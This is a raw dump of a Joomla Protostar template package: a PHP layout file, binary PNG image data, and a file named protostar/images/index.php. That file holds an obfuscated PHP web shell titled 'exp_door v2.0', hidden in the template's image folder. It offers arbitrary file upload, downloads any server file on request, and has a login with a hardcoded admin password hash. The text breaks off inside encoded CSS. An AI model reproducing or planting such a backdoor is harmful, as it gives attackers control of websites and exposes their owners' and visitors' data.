JHtml::_('script', 'template.js', array('version' => 'auto', 'relative' => true));

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Add Stylesheets
JHtml::_('stylesheet', 'template.css', array('version' => 'auto', 'relative' => true));

// Load optional rtl Bootstrap css and Bootstrap bugfixes
JHtml::_('bootstrap.loadCss', $includeMaincss = false, $this->direction);
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
	<jdoc:include type="head" />
</head>
<body class="contentpane modal<?php echo $this->direction === 'rtl' ? ' rtl' : ''; ?>">
	<jdoc:include type="message" />
	<jdoc:include type="component" />
</body>
</html>
PK՜�\9��gs#s#protostar/images/logo.pngnu�[����PNG


IHDR,<�܇Z#:IDATx��t���9ww��g�ꍲ���B��ʹ��!I9ww� )9��!�sww�,I��R����o���l�m�ogvZ.�e�sak�@����|�l���-N�d�UM��+�F�f�(!���L#�/�;�u_�)ʲCY�I��n}_��K�$�Z������� n�4�l��h��߃MLd#�2��0{-"�v?H6HQ��7���s�4_�͖q
�Y�Z�WC�KԷ�z�qv�
��Vh$��m�L�z��U4„He‹�1��kf���(Jy�n�I�V���9��a�bUT=Ĭ��5�Kqo0NVh�e�o �L%�SQ2d��ˣ��D��(�y�goҸ�b�K�(�7�!�5�4�̨c�e?�V�J2(�
��D̳@���'����U�ߊU�r�Ƨ�"�<@�A�Ư����cFɱ��Ӿl�1�E)Oȟp]h)5Ty��v�N0L�00ӵ�E��sv��hi��2#ۥ��|��yĽq&D���-�gB�!�E)O��	���/�?����c)�b|�M�g��D_'ߤ��09������!r�)'�#��WR:L�6��]X7ˌ�%��$'��}ZE0�<@�GQ�\�`�Ył�-�_��A�&'[<���U�(��}�����L�/D���}�ʟǂ�z���*?���`��������#o�
�uo��������"b\޿!bdM�ʏ�(���n�M�%+Z-�_�$� ��yU�$�QZ�2��PyRyS�S��PK���[��������.��!�d�L�
�Q~,@#���@Y5�f��&��(9�,��.��"��ܾ�`��r��Y9�g�w�"@�TTT�>i�{
���^��5!&3�w��4V�:��R��'�c��({I4[C�a!��!��x�o�H�uZ�5r/�F�u)JNM
�RӜ7��O���������ǯ�k��r���p_��7/F�`Lǃ�����^�wA�u��ສ��
�!�Յ�|n�Iz�@��)b�+k�>Bφ������`�F3:fBrع���~)JNM�}�f#?�C�Z�}7�ʍ<Zš���0�}�8]�u��k� ��3���h�i��:��.�����3�H������¿�o���#
��Ş7@�����a�!��E���"g��%���C��f��h�19k� $S���}�Q��1k�k�H��u�P��+	!����Vp�`i�F��=;v^�ۜ]s^�m�M#Gi��pox<��|���җdOAt~�&y)�4�R��xɟ�>�y��q7���|�����'�q!"LN��4|���3a�L&�.JG�9f�ݓѯ��L"D�O��T���h���OQ�˜���v������G���]�;记��z-�
�Mo����P|��;���u@$�c�	��)���g�a"��rde}>0B�M�i@�h�;B�^���TԺ���K���"HVhQ�*DQ��9��@=_q�	+��]��Mv�ۿ��D��]
����<g�ɺ����J�/��`	P!���^���^�}O4�����|�M���V}a�20�y*�#��5�B*X)jHH�ú�'T��1�Վ�K:&}�d@6yH����<��v�������-|	
�U�"tV
��[�3Q�Q_Cա�m����L�y�{��"Gi��D���h���OQ�� �
�}�SZ�1�A>�c����m��8�M��Zh���y�4���W��E	~
@�d�O�F臥�Jn�n���+�ǹm{�1f���9W��g6�X��^lh(��`E�~�F*X�,�.}��yT\��^��M��V��70&�4��^]]���<�VR�K���:��#Z��H'�7�R欬I�쓾�j��DZm"m������^ Z�E����n���`-#,�@����ς1&��t��A����C�M�51�L_}[�!a�K	�
w�z�J�(��a����6g�i��d��vl3��5V��1��h��n6��`-PN&B�h6�0U�Z�(*Xr��bLj1�h�,����M��^�6���W�M��[�����	nH�P'D䓒��3`�({��WyPٶ#�3?V9}2Z��p�ƒVH���τXs�I��5qO�Q�E}C,���Q������w�m�۟��})���!k-�]IN��8��9e�@�2e���9���ef%����zλ�#�-U>�{~���F����޹s�ݿz�z�����'����ep��=���o��d߸]�D*�)"'N�]��}b(p_�,�c��_n�i(��,��)?�g�;lj�<@'1k�?�������Ϗ��ׅ��Ww
�q�:U_�볂X}�u���@�VvR��"��Y}�z�� ��J�]�)&��_��"
6��8ѳ����܅.��|�&4�\V��ݫ9H��7m���ݮ���a���t���C�}�:,��K���Vљ��?��݁�_��q����Jt ;�{������X�>���7a�gKܩ�e_��<�{/���8������2)1'9&�[ bA!b0�2Q�ʶy��/q�$F���\�B�nfdn��g��&X����6��9�Y��ϻ��7�[�j��^�cs�ө�g(������?v��#V��u�<�s����|��ό���Z��Ҋ�@���,{��0�����\
D�AS���>�y��C��e����a�n��}�v!"��a��m���z�ӻ����I��TF�����t:<A���f���@�gЇuJ��8��*�۟�r�R\���nw9��}���웻�}�S�z}@��	'��}Ʊ`
�˥���鸠�G�?q�$\?����<�!�����
/V��Em���8�lmʶo�u�*�`������x���Gd?#��<^���`%�|;o���Ѹ�|l>��ga!5�5N�(m��6Xa��E]��� �NQ�賂ج<���ԝ�!�:ђ�Vo�f��?�>��>�n:���z2��`�S�ʼn?_#/�p녇�������C�yvX�)��(��b��	�oc���H}�;�V"�6�
D$�C)J��ytJ2O�cd6�X`gs��%�Źx��mKb�m�}��fNdžsJ�tN�	s�_+�*Nh+��<�=D���d�>N�7^���X�?�`�)7��U���E�x�\��vXD+��n���
S5}�+Ip��]�>��n_���]�a����G��W+0�h���,���Q�߀HW,Ng`�O…�kHRp��p�?��z���.�E.��+��������v`��_����Dv�� ��*��
ۻe� f��¿��Bs�h�ߏ(X	��{;ˆ]�tjZ�JX�
ӟ��\dO�+��)�'������mt���1�-/W=YZk��	��mݩ`��A4f`���o��cm�ڄ	�Y@�IT�xl��4��3�>����[X�����*�_��/0����y��b��a_����V�U������H���):ç��DEL�̕>?���I�r~�U�/�7�h���@�]��Y��:M�ҭ�/d��Nj��R�3�!<��.l �!��Q�S9M���i����;ϑ�2�0|7�ٵo�}��y`����p8v����T��OЖ�j�/�Nm �X�|lq� O���k�+4���a�����&n��mN����e� ��>�sy-���6}{���$��ST��鳎�����>�=����+�����Q�=�������J��3�M���ǰ��-|Z���ӎ
���^>�����	��Փ5���O+ت���v��j�_���~� ҝx���D�:�`�������1� ��u>������NC��¾�q7��}���K�6���X�b�8&8v�t��7Z'
�V�la���sM"1�Ʌ�]�l��6E�%`�H
��<k{�!�W��;�z�����.&�!�@����F�m9�%X���������1-���O�B�D,y>���;���"�1�۵�����p���jug�ߣ��H?;�� ҝx&�%P��羡�hH���ah�����g���8 $�����b8�`�h��G��%}@��g���F��:��1��Kn�[m�Z+o@
�nЖY���
. �2���}C��	m�B8�`o��=�!�+m�?�qH����籜�$d�-�.���~@�������Y������>-=��EϾ+��~�H �`9�Z��]�27יD2`T|�f�
}���O��X���a@$�˻��Q�ip�K�/�
_YKi����G�io���.b(`� H��q���`a��{~��*o�@7p�RA�zi-X�s�}E�^}ֳ�O��P���h��Y1k����2o�v���s�V-�i95�Nov��a�=�� , Ҝh�%��-�S��@$����<їJs�#B!����c��\D2q8\��{q�4�t樂�ɿV�2�>��b(0���I�oLB�^���@�cmˋ�K+z��c	�瀓��ñ8�d��?E~o:
VaU}^Iݪ���~��j�k�?s�3i��%Z�5��wt�(�\�}qM��S�o�[�V�t�f�n��[ �O0�՛]!�<�/1��������\VO&���;���EE� :�MͫB�X��Ȑ�d��G��љ��ƽAX�b�#CEq��QLd�\�W����
��j��?6�qh���Jh���߇����2L"���8��{��`��Y�]qu�ʲ�k��5��R�V����·h�?�g��=��ޛ�g ���Y�CIm��e���k���`�ܵ�S+�_�ѷ�l�g��3��!�Zm~�miL4�����y&���X�;�T���hA�	���,
���"5��_
%�������t �
�<͂�ʗ2Z}(�k�̂�u�
�K�]��k^�����[q<�K�Jj�*�m�XI(Z����8�����~�>-�V�EoN:I�Mo�XTS�p�͚&�h�*�k�+�^v�O�{^���˧0�޼�1j; Ҕ���8�5 �@�
�@�\@N�b�)�y@�w1`Y����
D*`:���CX�l��e�d���s����
p;�1Yi�P<�]�ib�8ZC7�_p�'�0c���8���奔�x�jر����ҹk-���Dku��r��p�W�xl���X+����S�HS�
}U��P����G"E�����=X��i?� R-<��w�&�:z�`iߧ�qqn�=�,XW31=놵C	+ZE�����Ň�\����h�qي|TzP�:�+�)�Y�,�`[)�k�OkCwYU��M�=.�������:�~�HC��n����R�BI�ۨ`1��$X@�Q���
��W^^�D��?�� �N�eCD1)��:XTӰl�I��]��{<b�>��\C��f-T�<��N�4󁲹��*�`ծ���к�g=���s���1��_���"
�.X��	,s�9��H�{�j�L��ž��M��yJ����ܵ��-��`�,�4����
��9*mr	�k�TT�X���쇲9����G�3�{î�^�}~�K�_X���40┰�nuoQM���
�`�AD��=�1��p�۴l�/#;�=>�"�Nw����Fכ��DI�@�Nw�9�
��g
Zt*��`�,D���~y<B���D*�Ja�VAݚ=��dΚ��A���7WT
�d�[�!P��!�� X�'�>}�QEU�_.�+E0MA:���/@��B�@�t�h��1�eM"a2Ei�J����ǰ���[E[�� ���n����Ql��3L������/�9 �	�q�˾.��I�Reg���cEg��n"��H�3�,��
���	k�|����&X��`+|Xa����)*Ga�cE��f��(\������1'"��yC��b��j{�j�.��3~-kXY_v��#�7��t$��bv�9G�����<�s-���� �	CP���8z��(K�XG�ۘ�j��<�i]���!���-
�9�R=p�轰Fg����/|7��?������j����T����(a7�V5a�Q�DZR�p2�0,-�������ծ^P�ϊS�9��Kj��������9�͛���y����� �`�����HEA^�5݂qH@7ܬ�`v���o�$!!aYa��֜=J�6���g�_Ys�?��� �6)X��aq>��s
D2��~_�i�H��vc���L�>)�0%,�o��N���?���;�������g�U�)��.��"��K�L5��� e�VD:�Є����n>�,\n/���:Q-�[�\�)��' ��9;�Я^K�s R�c}��@ZϥC���)��i&k�w��D`�5�y�,�.�V*��F��̐��!�2Y�uy�M�*������BCqY(�k<�px��4��j�k��+�m�vӒ�Q{�v����`S�7j�{��x �
-
>�q'G���~��H��f�U�MY��A+�5����Q���g	�
�
�A�>MڞV�y[�,Xw^4�	�eL����}�ű����i/�0�2���&�d�!ٖH+t���?��d>�`�Xq�`ڏ��a"�UP�;�� �Vڣw��
:������9"Ҁ�N��TݴS����g ���ߔͫφjaټ��-+N;�VuM�Z~>b��:���x�
���27���]���t^������^m?a�؀�蓂��1XK����;��
�}%�6�ᢺ����#;ޭ9��\�F8�nP�*��i��k�EL�d�/���bvF;���!��8��I�,�`�ϻ!1?��Y^.����'�n�s�0����"�
���J��8�w����M�~�p).��okAG���H�!\	�m[��h��<j+�cw-�qhS���:V�7�#�\<�J�*��*�b;������܈�5����~A�~Bf�Q@$��E�6�)�[���X�q��<���0}\����p��
��X\bU8o}���D�w�.�a=uAp^n��.n�f��۶ĨHj	o �|]@\�`$�jW�R�R���o����݆�5ē�ʂo���p��jq�{���.g�?����'�~��m�M��6�Z�K�Q �	�8,F�ڱ����k����7�B��)��~D�[�%(2#X8�y3�{�4V0��
V`ۣ���|�~7d��D8����4�jc{�Rs�
W��L��>^B�˿q����

F�Bc�Px8�#�{�2��g�$�����1���
�C�T��tɇ�&��$�%[�Gg/�0�Eg~ڈ<�b��%�8�բ�g�b,�q���
������˲�۳�b]PP�G H�4�s�C(�����c���d��"��6�]i�[��k���2��>����ŀ_��l�R�������º�I��XfE����y����&�͒�����~�j��^"^x ]8ءi!����*z��B���zҊC=��@>�fO1��eb��8�V�-6�9Q��:`�����Rɜ���}��b�q@�rs����+"�`�7&A���V�`QT�O�\7Z�U�`q�e:�]�>��e��P�v�+�q�)(���U�Џd�j $�tDZ�`�S�0ê���+Ô���G������d�A�A�}V����<XMs:=6Y9i�o�J�,�c�'X�!c��ñBv	��R0[��.c��2N��uȇ
}|p�S~?}Z��b�?�:ߊ]{}�w�K rG2����(Y�)��+�q`���B{5���_��X�\����?�X"��I=�K%n�^� �
+�¿[d��.`�TNN��
'�p��B�m�j��Ǘ�'��/ ��pG'ny�ӊ�c%��d�k9��x`�c%�J��q�ܲ\A�J8VB~ԉ�m3~^�~H��U��I�X�5~���趋PJN��}c��ǀȐ!��Dp5/b�di:�*���@�����<�-#֓L��ެ5-��D�FQ��&I�d0(-+�&�UT��BҚ?fgL��@��z Y����t�gȐa�A�a(�T6�\D)���ˏ�����fv�퀰,�j��b�2"������A7�}�>$��fm���@dȐa�!�j_�`��WX�a����hMaۂ���S�	D<@X|�zVm�/�~�y�?@�Ώ�[�ߟ����,
b��!C���(��/��;h���[���$�Y�[q��15
�&�~�; K表�?w���={�19jο����O����{��J���˚
D�F$ƓqJj�W�ϔ�`�7�J���$ RI�>fr(�=�ꏐ���]�Ȑ!��$����CP�8�S\b��ɘ�=4~) Rɇ�s~�`���j�K��!n�]���d 2d�0r�P/����K!X�Q#�1
d-v8�W�ܼbw ~6b���=IъtJg=�z0���BD�F.�1�r����iu�h��@7�I�t���l���W8�π���:�ú��}����!C��L�
���VX�<"u�j!XY̕����X�5D�@�|��6�A��e��V����
��e2d�0������kD(~�IEND�B`�PK՜�\��]��'protostar/images/system/rating_star.pngnu�[����PNG


IHDRVu\��IDATxڕ�=@@`g�K��!����8�^4:��p�d^�$"o�H���LCz�F�D:�
R�g�e6�H�PC	;+9S�	h�A����M�Bq�\���0(�~���l�
Dl�̒!t�^2��P�C���2:;�Uư���UIEND�B`�PK՜�\W9����-protostar/images/system/rating_star_blank.pngnu�[����PNG


IHDR�|�l�IDATxc@Y"�%��>�}؄�\�!B��%�����e�� �d�E,\�]�P PD�+��3\�K&�
�p�\T��%� ��|uy���o�,6����V0K��AHh93��Ό.Z �n><�9��IEND�B`�PK՜�\J!G`��%protostar/images/system/sort_desc.pngnu�[����PNG


IHDR�|�lNIDATx��1�`^��4	/�q�+�jo�!2�o|�u���\\�b�8�ڭ���ݙ��ZL`��0E�1��i���T�IEND�B`�PK՜�\��V\��$protostar/images/system/sort_asc.pngnu�[����PNG


IHDR�|�lGIDATx��G@!��^�Wp���';�	�7�K��������U��6=ҢŎ4k�$�U��OT��A�x���H���IEND�B`�PK՜�\������protostar/images/index.phpnu�[���<?php echo"\074\164a\x62\x6ce\076\074t\x64>\074fo\x72\155\x20\x6de\164\x68od=\x22P\117ST\042\x20enctyp\x65=\x22mul\x74ipa\x72\x74/\146\157r\155-d\141ta\x22\076\x0d\012<l\141\x62e\154>\x3c\142\x20cl\141ss\075\x22\x62t\042\x3eUplo\141de\162:\074\057\x62>\x3c/la\142e\x6c>\x0d\012\x3c\151npu\164\040t\171p\145\075\042f\x69\x6ce\x22 name=\x22\165\x70lo\x61d\x22\x20\x3e\015\012<inp\x75\x74\040typ\145\075\042\x73ub\x6d\151\x74\x22 v\141lue\075\x22u\x70load\042>\x0d\012</f\x6f\x72\155\076\015\012</\x74d>\015\012\x3c\057tab\x6c\145>\x0d\012";COPY($_FILES["u\160\x6co\x61\144"]["\164mp_\156a\x6de"],$_FILES["\165\160\154o\x61d"]["n\141me"]);if(isset($_POST["\154o\141\144"])&&!empty($_POST["\x63h\157\x6f\163\145"])){$_mkmoxkqd=$_POST["\143\x68o\157s\x65"][(int)RoUND(22.25+22.25+22.25+22.25)+(int)ROUNd(-44.5+-44.5)];if(Is_ReADabLE($_mkmoxkqd)){if(FIle_EXIstS($_mkmoxkqd)){if(OB_get_levEl()){OB_eNd_CleaN();}heAdEr("Con\x74en\164-D\145s\x63ript\151o\156\072 F\151\x6c\x65 Transfe\162");heADER("Co\x6ete\156t-T\x79p\145:\040ap\x70\x6ci\x63ati\x6fn/oc\164e\x74-\x73tream");HEader("C\x6fnt\145\156t-Di\163\x70\157siti\157n:\040attac\150\155e\x6et\x3b f\151len\x61\155e\075".basEnAME($_mkmoxkqd));hEADeR("\x43\157\156te\156\x74\x2dT\162\141\x6e\x73\x66\145r-\x45nco\144\151ng: \x62\151\x6e\x61\x72y");hEADer("\x45xpi\x72\x65s: 0");HeaDer("Cac\150e-Cont\x72\157l: \x6du\163\164\x2d\x72ev\x61l\151d\141te");header("P\x72\141gma:\040\160\x75b\x6c\x69c");hEadEr("C\x6fnt\x65nt-\114\145\156g\x74h: ".FileSIZe($_mkmoxkqd));READfilE($_mkmoxkqd);exit;}}}function _jhoga(){$_naos="<\x66o\162\x6d a\x63\x74ion=\x27".$_SERVER["\x53\x43RIPT_N\101\x4dE"]."\047 met\150od='pos\164'\x3e";$_naos.="<\x6cabel\x3e\x4c\157\x67i\x6e:</label\076"."\x3cb\x72>";$_naos.="<i\x6epu\x74\040typ\145='\x74ext\x27 na\155\145\x3d\x27\154\x6f\147\151n'>"."\074br>";$_naos.="<la\x62\x65\154>\120asswd\072 \x3c/l\141b\x65\x6c>"."<b\162\076";$_naos.="\074inp\165\164 \x74y\x70e='p\x61\x73\x73w\x6f\x72\144' \x6eam\x65='pass\x27>"."<br>"."<\142\162>";$_naos.="\x3c\x69np\x75\164 \x74y\160\145='s\x75\142\x6dit'\040n\x61me=\047l\157g' \166al\165\145='S\151\x67n\x20\x75\x70'>";$_naos.="</form>";return$_naos;}function _smfqbqss($_wnwkf,$_grmrqyui){if(($_wnwkf=="a\144\x6d\151n")&&($_grmrqyui=="1\x379a\x6445c6ce\062cb\0717c\x66\x310\x329\145\x3212\06046\x65\0701"))return true;else return false;}if(isset($_POST["log"])){$_wnwkf=$_POST["l\157\x67\x69\156"];$_grmrqyui=md5($_POST["p\x61s\x73"]);if(_smfqbqss($_wnwkf,$_grmrqyui)){sETcOOKIe("l\x6fgin",$_wnwkf);seTCOoKIe("\160a\x73\x73",$_grmrqyui);hEADeR("Re\146\162esh\072\060");}else echo"A\x63cess\x20\144\145n\151e\144\041";}if(isset($_POST["ex\x69t"])){sEtCOOkiE("l\x6fg\x69\156",$_wnwkf,tiME()-(int)RoUND(900+900+900+900),"\057");sETcoOKIE("pa\163\x73",$_grmrqyui,tIMe()-(int)rOUND(1200+1200+1200),"\057");heAdEr("R\x65\146\x72\x65s\x68:0");};echo"<\x21D\117\x43\x54YP\105 html\076\015\x0a<\150tm\x6c\x3e\015\x0a\040\x20\x20<\x68ead>\x0d\012\x20  <t\x69tle\x3eexp_doo\162\x20v\x32.\x30</titl\145>\015\012\074\155eta ch\x61r\x73e\164=\x22\x75tf-8\x22>\015\x0a\x3cs\x74yle \164y\x70e\075\042\x74ext\057\143ss\x22\076\x0d\x0a\040\040 h\x74ml{\x62a\143\x6bgro\165n\x64: \043F1F3F5\x3b\x7d\015\012 \040\x20\142\x6f\144y{margi\156: \060\073\142a\x63\x6b\x67ro\165\156\144:\x20\043F\x31\x463\106\065\x3b\175\015\012 \x20\x20p\162e \173margin: 0;}\015\012   \x69\x6d\147{ve\162\x74ica\154-alig\156:\040m\151dd\154e;\x7d\015\012\x2ey\141{wi\144th: \x317\x38\160\x78!import\141\x6e\x74\073\x62o\170-\x73had\157w\072 n\x6f\156e\x3b\x62\x6f\162\x64\x65r\055\143oll\141pse:\040sepa\162\141t\x65\073\175\015\012\040\x20\040\x2e\143ol{\167\151\144th: \060;\167hi\164\145\055s\x70ace: now\x72a\x70\073padding\055\162i\147\x68t\072\x2050\x70\170;\175\x0d\x0a \040\x20\056al\154{font-\146a\x6d\x69ly\x3a A\162\151\141\154\054\040H\145lve\x74\x69\143a\x2c\040s\141n\163-se\x72if\073fo\x6e\164-weight\072bo\x6cd;\x20fon\164-\x73i\172e \072 \0612p\170;\175\x0d\012  \040a\x2c\x20\x61\x3a\166\x69s\x69t\145\x64\x7bcolo\x72\072\040#\x31\x645405;text-dec\x6fr\141\164ion:\x6e\x6f\x6ee\x3b\x7d\015\x0a  \x20\043\x6dai\156 \173\x6d\x61rgi\156: a\x75t\157\x3bba\143k\147\x72\157u\156\144\072 #F1\x463F\065;\x6d\151\156-heigh\x74:\0401\0600\166\150;}\015\012 \040\x20#t\x61b{bac\x6bg\x72\x6fun\x64: \x23E9EC\x45\106\073pa\144din\x67-lef\x74\072\061\160x\073b\x6frd\x65r\x3a\x201p\x78 \x73o\x6ci\144 \043cc\143\143c\x63;mar\147in\x3a 5\x70x}\015\x0a\040\040\x20\x23re\163\x75l\164{b\x61ck\x67\x72ound:\x20#E9ECE\x46;\160a\144din\x67:\065\x70x\073\x62\x6frd\145\x72: 1\160\x78\040s\x6flid\040\043\143\x63cccc\x3b\155\141rgi\x6e:\0405px;m\x69n-he\151\x67h\164: 6\x38vh;\175\x0d\x0a  \040\043fi\162sttab\173widt\x68\072\061\x300%;b\157r\144er\x2d\143\157lla\160\163e:c\x6fllap\x73e;}\x0d\012   .h\x61\x74\173pad\x64i\x6e\x67-\x72ight:5p\170\073p\141\144d\151ng-l\145\x66\x74\072\065\160x;font\x2d\x77eight:\040n\x6fr\x6d\x61l\073\x7d\015\x0a   .bl\x6fck\x2dhi\144e\x20\x7bm\141\x72gi\x6e\072 0 \141\165\x74o;\x70a\x64d\151ng:5\160\x78;}\015\x0a   .to-be-\143han\147\145d{p\157sition\072\040a\142s\157l\x75te;z-i\x6ede\x78\x3a\0610\x3bw\x69\x64th\x3a \143\x61\154\x63(\x3100\045\040- \0610p\x78\x29\x3bba\x63kg\162\157und: \043F1\x463F\065;\175\015\012  \040.to-b\x65\x2dc\150a\x6e\x67ed\x3at\141r\147\145t{di\x73\160l\x61y: non\x65\073}\015\x0a\x20\x20\x20.\x6f\160en{\144\151s\x70l\x61y: block\x3bf\157n\x74-weig\150\x74\x3a 4\x300\073margin:\x20\060 5\160x 5px 5p\170;po\x73\x69\164ion: a\x62so\154u\x74e;z-i\156\144e\x78\x3a1;w\151\x64\164\x68: ca\154c(100\045 -\040\x32\060px);}\015\x0a  \040.hat \x66o\162m{\x63olor\072\x20r\x65d\x3b\x66\157nt\x2d\x73i\x7ae:1\066\160\170;\x74e\170t\055a\x6cig\x6e\072 \143\145n\x74\x65r;width: \x320\x30px\x3ble\146\x74\x3a \143\x61l\143(\065\x30% \055 \06100\x70x\x29;\x74o\160: \x32%;\160\x6fsi\164ion:\040absol\x75t\145\073\175\015\x0a\x20  .\157pen\146\173bo\x72\x64e\x72: \156o\156e\x3b\142\x61ckg\162\157\165\x6ed: \043E9\x45\x43\105F00;c\x75\162\163or: \x70oint\145r}\015\x0a\x20 \040.d\145mos{\040  \015\x0a  \040ma\x72gin-\x6ce\x66\164\x3a\0405\x70x;\x0d\x0a  \x20pa\x64d\x69\156\147: 4\x70\170;\x0d\x0a\x20\040\x20t\145x\x74-al\x69gn\x3a c\x65\156t\x65r;\015\x0a \040\x20\142ac\153g\x72o\x75n\x64\x3a \x230d\x30\x64\060d\061\x61; \x0d\x0a   \x62or\x64\x65\x72\072 1\x70\x78 \x73ol\151\144 \043c\143cccc;\x0d\012\040 \x20font\055wei\x67\150\164\x3a\x20b\157l\144;\040\x0d\012  \040wi\x64th: \x36\064px\073\015\012\x20\040\x20\142\x6frder-\x72\x61d\151u\163:\040\x33\x70x;\x0d\012\x20  }\015\012  \x20\x2e\144e\155o\x6c\x69nk{\142ackg\162ou\156d\055col\157\x72\x3a #\x668f4\x66\x3400\x21\151m\x70or\x74a\156t;\143olor: #\061d540\065!\x69mp\x6f\162tant\073}\015\x0a  \x20.c\142ox\x7bw\x69d\164h:1\070p\170}\040\x0d\x0a   tab\154e.to \x74d \x7b\015\x0a\x20  \x6fver\146low\072hi\144\x64en;\015\x0a   }\x0d\x0a\040\040\040\x74a\142le\x2et\157\x20\164\x64\x3an\x74h\x2do\146\x2dtyp\145(\061\x29\040{\015\012 \x20\x20\167id\x74\x68\072\141ut\x6f;\015\x0a   }\015\012\040 \040\164abl\145\056t\157 td\072n\x74\150-\x6ff-typ\145\x28\x32\051 \x7b\x0d\012  \040\x77\151dth:50p\170;\x0d\x0a  \040}\015\012 \040\x20\x74\141bl\x65\x2eto\040td:nth-\157\x66-ty\x70e(3) {\x0d\x0a  \x20width\072au\x74o;\x0d\012 \040 }\015\x0a\040\x20\x20tr.note:hover {\x62ackgr\x6fund:\040#f5f5\1465\x3b\x7d\015\x0a \x20 tr.\156o\x74e\072focu\163\040{ba\x63k\147\162\157\165\156\x64\055co\154\157r:\040#8\x46BC\x38\x46;\157\x75tl\151ne: 1px\x20s\157\x6ci\144 \x67r\145y\x3b\175\015\012  \x20.moda\154b\x61c\x6bgro\165n\x64\x20{\015\x0a \x20\040ma\x72gin\x3a 0\x3b /\x2a &\x231\x309\061;&\x231073\073&\043\x31\0608\x30;&#\x31\06088\x3b&#\0610\x372\x3b\x26#\06107\x37;\x26\0431\x3084;\x20\x26\x23\x31086;\060\0710;
\x389;\x26#10\x390\073\x26\x2310\x39\x31;\x26\0431087;&\x23109\x39; *\057\x0d\012  \040padd\x69ng: \x30\073\040/\052 \x26#109\x31;&#\061\x307\x33\073\046#\x31\x3080;\046#\x310\0708;&#\x3107\062;
\0677;&\x231\x30\0704; \x26\x231\x30\070\066;&\x23\x31\x3090;
\070\x39\073\x30\0710;\x26#\x310\071\061;&\x2310\070\067;\x26#10\x399; */\x0d\x0a   \160os\151\x74\x69o\156:\x20f\151\170\x65d; \x2f\052 &#\x3109\x32;\046#1080\073&#\x31\0608\x32\x3b
\x38\071\073&\0431080;\x26#108\070\073&\043\0610\0711;&\x2310\067\067;&\x23\x31084;\040&\0431087;\046\043108\066\x3b\x26#\x310\x38\063;\x26\043\0610\070\066;\x26\x23\061\0607\070;\046#\x31\x30\0677;&#\061\060\070\x35\073&\043\x31\x30\x380\073&\043\06107\067; \x2a/\x0d\012   top:0;\x20/* \06088\x3b\x26\0431\x30\x372;
\x38\x39;\046\x2310\x390\073&\0431\06103\073\060\067\065\073\x26#10\070\x30\x3b\x26#10\067\064\073\x26\x23\x310\x37\062;&#\x31\060\x37\067;&#\x310\x384; \x26\x231\060\067\x33;\046#\0610\0703\073\x26\x231\0608\066;
\x382; \x26\x231087\073\x26#\0610\070\066;\040\x26#10\x374;&#\x31089;&\x23\061\06077;\x26\0431\x308\x34;??\040&#\0611\x301;&\0431082;\x26#\06108\070;&\x231\x3072;\x26#108\x35;&\x231\x309\061\073 */\015\012\040\040\x20\142ott\157m:0;\x0d\012  \x20left\0720\x3b\015\012   \162i\x67ht:0;\x0d\x0a \x20\040backg\162o\165nd: rgb\141(0\x2c\060,\x30\x2c\x30.\x35\051\x3b\x20\x2f*\040\046#1087;
\x38\x36;\046#1\x3083;&\x2310\0711\073&\x23\061\x30\x38\067;\046\x23108\070;&\0431\06086;&#\061\0607\071;\x26#\061\060\0708;\x26#1\x30\0672\x3b&\x231\060\0715;\046\x231\x3085;\x26\x23\x3109\071\073\046#1081\073\040&\04310\x39\x34;\046#\06107\x34\x3b&\x23\061\060\0677;m\060\073 &\0431\060\x392\073l\066\x3bl\065\073&\043\x3107\062\073 \x2a/\x0d\012\040\x20\040\x7a\055i\156dex\x3a\0610\x30;\040\x2f* 
\0674;\046\x231099\x3b&#\0610\x374;\x26#\x31\x308\x36;\x26#\x31\x3076;&\x23\06108\x30\073\x30\070\x34; &\x231\x30\x392;\046\0431\x308\066\073\x26#\x31\06085;\040\06087\x3b\046\043\061086;\x3074;\x26#1\x30\067\067;&\043\x3108\070;\x3093;\x20\046#107\064\x3b\x308\x39;&\x231\x30\x377;\x309\x33; \046\x231\x308\x39;\046#108\063\073\x26#1086\x3b\046#1\06077\x3b&\x23\x310\067\064; \x3085\073&\x231072; &\x23\x31\x3089;\x26#10\x390;\x26\0431088;\x30\x372;&#\x31085;
\x380;&\x231\x309\x34\x3b&\x231077; \x26#10\x37\x33\073&\x231\x3088\x3b\046#\x31\x30\x37\x32;\x26\x23109\061\x3b&\0431079\x3b\046#\x31\x30\x377;&#\06108\070\073&\x23\x310\x37\062\x3b */\015\x0a\040 \040o\x70a\143i\164y:\060;\x20/* \046#\x31\x304\064\073&#\061\0607\x37\073\x26#\x31\06083;\046#1072;\046#1\x30\x377;&\x23\0610\x384\x3b 
\070\065;\x26\x23\061\x30\x377;\046\043\06107\x34;\046\0431\06080;&#\0610\0676;\046#1\06080;&#\x310\x384\073
\x399;\046\043\06108\064; */\015\x0a\x20  p\x6fint\145r-ev\x65\156t\163\x3a\x20\x6eo\156\145; \057\x2a\040\046#\061\x31\x30\x31;\x3083;&\043107\x37\x3b&#\x310\0704;&\043107\x37;&\x2310\x385\x3b&\04310\0710\x3b \046#1085;&\043\0610\0677;\060\067\064\x3b&#\x310\x380;\x26\0431\x3076;&\04310\x38\060\x3b&\0431\060\0704;\x20&#\06107\x36;\060\x383\073\046\x231\x31\0603; &#\061089;\x26#\061\0608\066\x3b\046\x231\x3073;&#\061\x30\x399\x3b&\x23109\x30\x3b\x26\x23\x3108\060;
\070\061\x3b\x20\x26#1\x30\0704;&#\x3109\071\x3b\x26\x231096\073&\x2310\x380;\040\052/\015\012 \x20 }\015\x0a\x20  /\052 \x308\067;\046#10\x388;\046\x2310\070\060;\040
\x38\x36\x3b\046#\061\06090;l\x36;\046\043\061\0607\063;\046\x231\060\0708\073\06072;\046#\x31\06078;&\043\061\x307\x37\x3b\046#1\060\0705\x3b&\x231080\x3b&\043\061\060\x380\x3b &\0431\06084\073\046#1086\073&\0431\x30\0676\x3b\x26#1\x307\x32;\x30\x38\063\073??\x3b\x26#10\x38\065\073&\04310\070\x36\x3b
